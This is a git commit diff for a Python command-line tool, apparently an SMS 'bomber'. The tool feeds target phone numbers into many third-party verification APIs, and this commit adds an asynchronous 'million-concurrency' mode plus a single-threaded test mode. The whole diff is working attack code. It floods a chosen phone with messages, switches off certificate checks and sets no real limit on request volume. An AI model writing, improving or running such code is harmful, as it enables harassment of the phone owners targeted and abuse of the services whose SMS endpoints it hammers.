feat: 使用异步实现真百万并发

This commit is contained in:
AdminWhaleFall
2022-05-14 18:59:59 +08:00
parent 37034b6f17
commit 8a3d1486dd
3 changed files with 105 additions and 18 deletions

View File

@@ -1,6 +1,5 @@
# encoding=utf8
import httpx
# import requests
from .model import API, default_header
@@ -24,16 +23,7 @@ def test_resq(api: API, phone) -> httpx.Response:
print('json')
resp = client.request(
method=api.method, headers=api.header, url=api.url, json=api.data)
# 验证不是 httpx 的问题...
# if not isinstance(api.data, dict):
# print("data")
# resp = requests.request(method=api.method, headers=api.header,
# url=api.url, data=api.data)
# else:
# print('json')
# resp = requests.request(
# method=api.method, headers=api.header, url=api.url, json=api.data)
return resp

View File

@@ -6,6 +6,7 @@ import sys
import time
from concurrent.futures import ThreadPoolExecutor
from typing import List, Union
import asyncio
import click
import httpx
@@ -13,7 +14,7 @@ import httpx
from utils import default_header
from utils.log import logger
from utils.models import API
from utils.req import reqFunc
from utils.req import reqFunc, runAsync
# current directory
path = pathlib.Path(__file__).parent
@@ -43,6 +44,7 @@ def load_json() -> List[API]:
# return None
raise ValueError
def load_getapi() -> list:
"""load GETAPI
:return:
@@ -99,6 +101,33 @@ def run(thread: int, phone: Union[str, tuple], interval: int, super: bool = Fals
pool.submit(reqFunc, api_get, phone)
@click.option("--phone", "-p", help="手机号,可传入多个再使用-p传递", prompt=True, required=True, multiple=True)
@click.command()
def asyncRun(phone):
"""以最快的方式请求接口(真异步百万并发)"""
_api = load_json()
_api_get = load_getapi()
apis = _api+_api_get
loop = asyncio.get_event_loop()
loop.run_until_complete(runAsync(apis, phone))
@click.option("--phone", "-p", help="手机号,可传入多个再使用-p传递", prompt=True, required=True, multiple=True)
@click.command()
def oneRun(phone):
"""单线程(测试使用)"""
_api = load_json()
_api_get = load_getapi()
apis = _api+_api_get
for api in apis:
try:
reqFunc(api, phone)
except:
pass
@click.command()
def update():
"""从 github 获取最新接口"""
@@ -130,6 +159,8 @@ def cli():
cli.add_command(run)
cli.add_command(update)
cli.add_command(asyncRun)
cli.add_command(oneRun)
if __name__ == "__main__":

View File

@@ -1,24 +1,26 @@
# encoding=utf8
# 请求的方法
import httpx
from typing import Union
from httpx import Limits
from typing import Union, List
import asyncio
from utils import default_header
from utils.models import API
from utils.log import logger
def reqAPI(api: API, client: httpx.Client) -> httpx.Response:
def reqAPI(api: API, client: Union[httpx.Client, httpx.AsyncClient]) -> httpx.Response:
if isinstance(api.data, dict):
resp = client.request(method=api.method, json=api.data,
headers=api.header, url=api.url)
headers=api.header, url=api.url, timeout=10)
else:
resp = client.request(method=api.method, data=api.data,
headers=api.header, url=api.url)
headers=api.header, url=api.url, timeout=10)
return resp
def reqFunc(api: Union[API, str], phone: Union[tuple, str]):
def reqFunc(api: Union[API, str], phone: Union[tuple, str]) -> bool:
"""请求接口方法"""
# 多手机号支持
if isinstance(phone, tuple):
@@ -34,10 +36,74 @@ def reqFunc(api: Union[API, str], phone: Union[tuple, str]):
resp = reqAPI(api, client)
logger.info(f"{api.desc}-{resp.text[:30]}")
else:
api = api.replace("[phone]", ph)
api = api.replace("[phone]", ph).replace(" ", "").replace('\n', '').replace('\r', '')
resp = client.get(url=api, headers=default_header)
logger.info(f"GETAPI接口-{resp.text[:30]}")
return True
except httpx.HTTPError as why:
logger.error(f"请求失败{why}")
return False
async def asyncReqs(src: Union[API, str], phone: Union[tuple, str], semaphore):
"""异步请求方法
:param:
:return:
"""
# 多手机号支持
if isinstance(phone, tuple):
phone_lst = [_ for _ in phone]
else:
phone_lst = [phone]
async with semaphore:
async with httpx.AsyncClient(
limits=Limits(max_connections=1000,
max_keepalive_connections=2000),
headers=default_header,
verify=False,
timeout=99999
) as c:
for ph in phone_lst:
try:
if isinstance(src, API):
src = src.handle_API(ph)
r = await reqAPI(src, c)
else:
# 利用元组传参安全因为元组不可修改
s = (src.replace(" ", "").replace("\n", "").replace("\t", "").replace(
"&", "").replace('\n', '').replace('\r', ''),)
r = await c.get(*s)
return r
except httpx.HTTPError as why:
logger.error(f"异步请求失败{type(why)}")
# logger.error(f"异步请求失败{why}")
# import aiofiles
# async with aiofiles.open("error.txt","a",encoding="utf-8") as f:
# await f.write(f"{str(s[0]) if str(s[0]) else str(src)}\n")
except TypeError:
logger.error("类型错误")
except Exception as wy:
logger.exception(f"异步失败{wy}")
def callback(result):
"""异步回调函数"""
log = result.result()
if log is not None:
logger.info(f"请求结果:{log.text[:30]}")
async def runAsync(apis: List[Union[API,str]], phone: Union[tuple, str]):
tasks = []
for api in apis:
semaphore = asyncio.Semaphore(999999)
task = asyncio.ensure_future(asyncReqs(api, phone, semaphore))
task.add_done_callback(callback)
tasks.append(task)
await asyncio.gather(
*tasks
)